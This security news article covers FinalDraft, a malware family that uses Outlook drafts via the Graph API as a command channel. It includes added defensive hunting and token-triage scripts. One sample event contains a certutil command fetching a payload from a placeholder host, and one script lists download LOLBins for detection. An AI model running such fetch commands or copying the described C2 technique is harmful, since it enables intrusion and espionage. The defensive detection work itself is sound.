New family of data-stealing malware leverages Microsoft Outlook
CISOs have yet another attack vector to worry about: a newly discovered family of data-stealing malware that abuses the Microsoft Graph API to turn Outlook mailboxes into a command-and-control channel, and that carries a pass-the-hash capability for authenticating with stolen NTLM password hashes.

Researchers from Elastic Security say the malware was created by an unnamed group targeting the foreign ministry of a South American nation, but there are also links to compromises at a university in Southeast Asia and telecoms in that region.

The campaign is characterized by a “well-engineered, highly-capable, novel intrusion set,” the researchers say in a report.

The campaign against the South American country may have started in November 2024. That is when Elastic Security detected a tight cluster of endpoint behavioral alerts within the country’s foreign ministry. It isn’t clear how the environment was initially compromised, but once inside the gang relied on living-off-the-land tactics, including using certutil (the Windows certificate utility) to download files.

Espionage seems to be the motive, says the report, and there are Windows and Linux versions of the malware. But fortunately the gang “exhibited poor campaign management and inconsistent evasion tactics,” it notes.

Watch for the signs

Nevertheless, CISOs should be watching for signs of attack using this group’s techniques, because their targets could become more widespread and the techniques more sophisticated.

One thing CISOs should immediately note: after initial compromise, the gang used WinrsHost.exe, the process that hosts Windows Remote Management (WinRM) remote shell sessions on the target, to download files. These include an executable and accompanying .rar, .ini and .log files. The executable is a renamed copy of CDB.exe, the Microsoft-signed command-line debugger. Abusing this signed binary let the attackers execute malicious shellcode delivered in a config.ini file while appearing to run a trusted program, the report says.

Using WinRM’s remote shell in this way “indicates that attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment,” the report says. “How these credentials were obtained is unknown.”

Preventing lateral movement is always tricky if an attacker has obtained valid credentials, noted Johannes Ullrich, dean of research at the SANS Institute, in an email to CSO. “They could come from other breaches (credential stuffing) or maybe just from keystroke loggers or info stealers they may have deployed during earlier phases of the attack that are not covered in the writeup.”
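The process-ancestry pattern described above (files fetched under WinrsHost.exe, a download LOLBin such as certutil, and a Microsoft-signed debugger running under another name with an .ini argument) can be turned into a small hunting script over endpoint telemetry. The Python below is an added example written for this page, not code from Elastic or from the report. The events are constructed Sysmon-style process-creation records; the file names, paths and the 203.0.113.10 address are placeholders. It generalizes slightly beyond the article by checking a short list of download LOLBins rather than only certutil, and by flagging any binary whose on-disk name differs from its PE OriginalFileName, not only a renamed CDB.exe.

```python
# Constructed Sysmon Event ID 1 style records (not telemetry from the report).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WinrsHost.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "OriginalFileName": "winrshost.exe",
     "CommandLine": "winrshost.exe -Embedding", "User": "CORP\\svc-admin"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\WinrsHost.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -split -f http://203.0.113.10/config.ini "
                    "C:\\ProgramData\\config.ini", "User": "CORP\\svc-admin"},
    {"Image": r"C:\ProgramData\svchost.exe",          # renamed cdb.exe (placeholder name)
     "ParentImage": r"C:\Windows\System32\WinrsHost.exe",
     "OriginalFileName": "CDB.Exe",
     "CommandLine": r"svchost.exe -cf C:\ProgramData\config.ini", "User": "CORP\\svc-admin"},
    {"Image": r"C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe",  # benign dev use
     "ParentImage": r"C:\Windows\explorer.exe",
     "OriginalFileName": "CDB.Exe",
     "CommandLine": "cdb.exe -p 4242", "User": "CORP\\dev"},
]

# Binaries commonly abused to pull files from the network (generalizes past certutil).
DOWNLOAD_LOLBINS = {"certutil.exe", "bitsadmin.exe", "curl.exe", "powershell.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def renamed_signed_binary(ev: dict) -> bool:
    """True when the on-disk name differs from the PE OriginalFileName field,
    the classic sign of a signed system binary being run under a new name."""
    orig = ev.get("OriginalFileName", "")
    return bool(orig) and basename(ev["Image"]) != orig.lower()


def classify(ev: dict) -> list:
    """Return the detection tags that apply to one process-creation event."""
    findings = []
    parent = basename(ev["ParentImage"])
    image = basename(ev["Image"])
    cmd = ev.get("CommandLine", "").lower()
    if parent == "winrshost.exe":
        findings.append("winrs_child")                      # remote shell spawned it
        if image in DOWNLOAD_LOLBINS and "http" in cmd:
            findings.append("winrs_lolbin_download")        # LOLBin fetching over the network
    if renamed_signed_binary(ev):
        findings.append("renamed_binary:" + ev["OriginalFileName"].lower())
        if ev["OriginalFileName"].lower() == "cdb.exe" and ".ini" in cmd:
            findings.append("cdb_ini_script")               # debugger fed a script/config file
    return findings


def hunt(events: list) -> list:
    """(image name, tags) for every event that triggered at least one tag."""
    results = []
    for ev in events:
        findings = classify(ev)
        if findings:
            results.append((basename(ev["Image"]), findings))
    return results


if __name__ == "__main__":
    for name, tags in hunt(SAMPLE_EVENTS):
        print(f"{name:14s} {', '.join(tags)}")
```

The genuine cdb.exe launched from Explorer by a developer produces no tag, because its file name matches its OriginalFileName and it is not a child of the WinRM shell host; the two events under WinrsHost.exe are the ones an analyst would pivot on.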

The main components of the malware this attacker uses, which include a loader and a backdoor, are:

  • PathLoader, a lightweight Windows executable that downloads and executes encrypted shellcode hosted on a remote server. It uses anti-sandbox checks to avoid executing immediately in a target organization’s sandbox, and hinders static analysis with API hashing and string encryption;
  • FinalDraft, a 64-bit backdoor written in C++ that focuses on data exfiltration and process injection. It ships several modules that the backdoor can inject into other processes; their output is forwarded to a command and control (C2) server.
    On first run it gathers information about the compromised host, including computer name, account username, internal and external IP addresses, and details of running processes. FinalDraft also includes a pass-the-hash toolkit, similar to Mimikatz, for authenticating with stolen NTLM hashes.

One communication method is the Outlook mail service, reached through the Microsoft Graph API, which lets developers access resources hosted on Microsoft cloud services, including Microsoft 365. Calls to the API require an OAuth access token, and FinalDraft obtains one itself: the report describes it exchanging a refresh token carried in its configuration for a Graph token. The C2 exchange then rides on mailbox drafts created and read through the API rather than on sent messages, so nothing leaves the mailbox in a form a mail gateway would inspect. According to a report by Symantec last year, a growing number of threat actors are abusing the Graph API to hide their communications inside legitimate cloud traffic.
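When a Graph access token or a Graph request turns up in host memory, a proxy log or a registry dump during an investigation, the first questions are which application the token was issued to, what it is allowed to do, and whether the request touched the mailbox. The Python below is an added example written for this page, not code from Elastic or the report. It decodes a token's claims without verifying the signature (adequate for triage, never for authorization), classifies Graph request paths, and flags mail-scoped tokens issued to applications outside an allowlist. The application IDs, the sample tokens and the allowlist are constructed placeholders; the only real identifiers are the Graph audience values. It goes slightly beyond the article by also checking the token audience and scopes rather than just app identity.

```python
import base64
import json
from urllib.parse import urlparse

# Constructed allowlist: app IDs an organization expects to see reading mail.
# The GUID is a placeholder, not a real Microsoft client ID.
EXPECTED_MAIL_APPS = {"11111111-2222-3333-4444-555555555555"}
# Two forms of the Microsoft Graph audience seen in real tokens.
GRAPH_AUDIENCES = {"https://graph.microsoft.com", "00000003-0000-0000-c000-000000000000"}
MAIL_SCOPES = {"Mail.Read", "Mail.ReadWrite", "Mail.Send"}


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_unsigned_jwt(claims: dict) -> str:
    """Build a compact JWT with an empty signature; only for constructing test input."""
    header = _b64url(json.dumps({"alg": "none", "typ": "JWT"}).encode())
    return f"{header}.{_b64url(json.dumps(claims).encode())}."


def token_claims(jwt: str) -> dict:
    """Decode the payload of a JWT WITHOUT signature verification.
    Good enough to read appid/scp/aud from a recovered token during triage."""
    parts = jwt.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWT")
    return json.loads(_b64url_decode(parts[1]))


def graph_mail_path(url: str) -> bool:
    """True if the URL is a Graph call against mail folders or messages."""
    p = urlparse(url)
    if p.netloc.lower() != "graph.microsoft.com":
        return False
    path = p.path.lower()
    return "/mailfolders" in path or "/messages" in path


def triage(jwt: str, url: str) -> list:
    """Reasons a (token, request) pair deserves a closer look; empty means nothing odd."""
    claims = token_claims(jwt)
    reasons = []
    if claims.get("aud") not in GRAPH_AUDIENCES:
        reasons.append("audience_not_graph")
    scopes = set(claims.get("scp", "").split())
    if scopes & MAIL_SCOPES and claims.get("appid") not in EXPECTED_MAIL_APPS:
        reasons.append(f"mail_scope_for_unexpected_app:{claims.get('appid')}")
    if graph_mail_path(url) and "/mailfolders/drafts" in urlparse(url).path.lower():
        reasons.append("drafts_folder_access")   # drafts never traverse the mail gateway
    return reasons


# Constructed sample tokens and requests.
EXPECTED_TOKEN = make_unsigned_jwt({
    "aud": "https://graph.microsoft.com",
    "appid": "11111111-2222-3333-4444-555555555555",
    "scp": "Mail.ReadWrite User.Read",
    "upn": "analyst@example.com",
})
ODD_TOKEN = make_unsigned_jwt({
    "aud": "https://graph.microsoft.com",
    "appid": "deadbeef-0000-0000-0000-000000000001",
    "scp": "Mail.ReadWrite User.Read",
    "upn": "compromised.user@example.com",
})
DRAFTS_URL = "https://graph.microsoft.com/v1.0/me/mailFolders/drafts/messages"
INBOX_URL = "https://graph.microsoft.com/v1.0/me/messages?$top=10"

if __name__ == "__main__":
    print("expected client, inbox read:", triage(EXPECTED_TOKEN, INBOX_URL))
    print("unknown client, drafts access:", triage(ODD_TOKEN, DRAFTS_URL))
```

A mail-scoped token for an application nobody registered, combined with traffic to the drafts folder, is exactly the shape of the channel described above; an allowlisted mail client reading the inbox produces no findings. In production the allowlist would come from the tenant's registered applications and consent grants rather than a hard-coded set.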

In addition, FinalDraft can start a TCP listener after adding an allow rule to the Windows Firewall; the rule is removed again when the listener is shut down. It can also delete files, overwriting them with zeros before deletion so that they cannot easily be recovered forensically.

“I think this is a great example of using the ‘living-off-the-land’ (LOLBins) technique to its fullest potential,” commented Ullrich. “This points to an adversary who did their homework to customize this attack to most effectively hit this target. An attack like this is truly difficult to defend against. The ‘Advanced’ in APT [advanced persistent threat] is often more visible in this preparation vs the actual tools used and execution of an attack.”

Detection rules

At the end of its report, Elastic Security lists several YARA rules it created and posted on GitHub to help defenders: rules that detect PathLoader and FinalDraft on Windows, and a separate rule that detects FinalDraft on Linux.
